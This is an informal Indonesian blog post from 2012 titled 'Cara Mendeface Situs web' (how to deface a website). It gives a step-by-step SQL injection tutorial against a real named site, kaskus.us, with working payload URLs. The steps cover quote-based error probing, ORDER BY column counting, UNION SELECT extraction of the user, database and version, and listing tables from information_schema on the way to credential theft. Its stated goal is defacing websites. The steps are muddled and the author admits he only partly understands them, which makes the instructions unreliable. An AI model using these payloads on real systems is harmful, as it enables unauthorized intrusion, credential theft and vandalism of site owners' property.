Minggu, 05 Februari 2012

Cara Mendeface Situs web

Hack, Hack bagi seseorang yang yang kurang paham kata tersebut adalah kata yang menyeramkan :p
pda kali ini saya akan memberitahukan Cara Mendeface Situs web 
catatan : 
digunakan untuk mendeface situs - situs tertentu seperti  situs yang tidak baik ( kalo mampu :P)
berikut langkah  - langkanya :


1.Cari  target
ex   :  http://www.kaskus.us/shop.php?id=96

2.cari tau ada bugs atau nga 
cara : tambahin ' di akhir uid http://www.kaskus.us/shop.php?id=96'kalo ada pesan erornya,berarti tuh ada   bugsnya berati siap kita oprek. 

3.hitung field di databasenya
 cara : tambahin +order+by+nominal/*contoh :http://www.kaskus.us/shop.php?id=96+order+by+14/*

disini kita main tebak tebakan.Kira2 ada berapa field di databasenya. Kita isi ajanominalnya dari 1 sampai ada pesan erornya.pada contoh di atas jumlah kolomnya ada14,berarti pada nominal ke 14 pesan erornya tidak ada,and pada nominal 15 ada pesan erornya 4.
4.Sekarangh kita cari magic numbernya 
cara : abis uid kita tambah +union+select+nominal jumlah kolomcontohhttp://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*liat angka berapa yg nongol. dalam contoh ini yg keluar angka 65.
5.sekarang kita liat versinya
{ada yg bilang klo bagian ini ga penting banget}cara : maggic number yg keluar tadi kita ganti denganconcat_ws(user(),0x3a,database(),0x3a,version()).pada contoh diatas adalah angka 6 contoh 


http://www.kaskus.us/shop.php?id=989 unionselect1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*6.keluarin tablenyacara kita tambahkan +from+information_schema.tables/* setelah angka terakhir

contoh  :
http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tablesups 
ga isa...akalin ah.gimana kalo ditambahin lagi menjadi http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/*/* 
gunanya apa itu sih???? hehehe aku juga ga ngerti , pas saya coba ternyata gagal, saya konsultasi sama teman kata dia suruh nambah itu di belakanganya, walhasil bisa kalian liat hasilnya .


6.saatnya cari kolom
cara sama kaya cara diatas,cuman tabel ganti aja sama kolom .
cari user name n pass nyanah buat yg satu ini aku belom pamah bener jadi ga berani aku tulis,soalnya aku juga masih mumet ,pernah nyoba,pernah sukses,pernah gagal.cuman buat kasus yg ini,contoh ini aku udah tau kelanjutanya,soalnya di bantu temen pas bagian ininya.

sekian yang dapat saya sampaikan semoga bermanfaat tambahan 
download video yang terkait :
download di sini....         

0 komentar:

Posting Komentar